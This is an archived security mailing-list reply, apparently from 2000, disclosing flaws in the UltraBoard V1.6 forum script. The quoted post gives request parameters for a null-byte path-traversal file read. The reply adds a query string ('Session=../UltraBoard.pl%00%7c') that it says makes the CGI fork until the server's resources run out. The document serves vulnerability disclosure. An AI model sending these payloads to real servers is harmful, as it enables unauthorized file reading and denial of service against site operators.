jmbelloITCHY.COVERLINK.ES

• Next message: THE INFAMOUS: "Fwd: tcpdump workaround against dnsloop exploit."
• Previous message: Sebastian: "Re: Denial of service attack against tcpdump"
• In reply to: rudi carell: "Fun with UltraBoard V1.6X"
• Reply: Juan M. Bello Rivas: "Re: Fun with UltraBoard V1.6X"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hola,

On Wed, May 03, 2000 at 02:13:16AM -0700, rudi carell wrote:
> found some interesting things in the "old" UltraBoard-Forum scripts
> (UltraBoard V 1.6)
>
> class:Input Validation Error
> remote:Yes
> vulnerable:UltraBoard V1.*
> vendor: www.ultrascripts.com || www.ub2k.com
>
> Description:
> By using the good old NullByte(\000) its possible to open "any" file on the
> webserver(with its permissions) running the "UltraBoard" forum-software.
>
> cgi-script:
> UltraBoard.pl || UltraBoard.cgi
>
> Variables:
> Action=PrintableTopic
> Post=[path_including_".."_to_any_file][***NULLBYTE***]
> Board=[valid_board]
> Idle=10
> Sort=0
> Order=Descend
> Page=0
> Session=

        There's even more fun availiable with old versions of ultraboard
(and I think the latest beta of ultraboard 2000 is also vulnerable to this).
        You can bring the web server to its knees by issuing a request to
the CGI like this:

        QUERY_STRING=Session=../UltraBoard.pl%00%7c

        It will start forking instances of the CGI until it eats all the
resources of the machine.

Later.

Juan M. Bello Rivas

--
"Let's suppose you just finished writing `zardoz',
 a program to make your head float from vortex to vortex."
			From GNU automake documentation.

• Next message: THE INFAMOUS: "Fwd: tcpdump workaround against dnsloop exploit."
• Previous message: Sebastian: "Re: Denial of service attack against tcpdump"
• In reply to: rudi carell: "Fun with UltraBoard V1.6X"
• Reply: Juan M. Bello Rivas: "Re: Fun with UltraBoard V1.6X"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]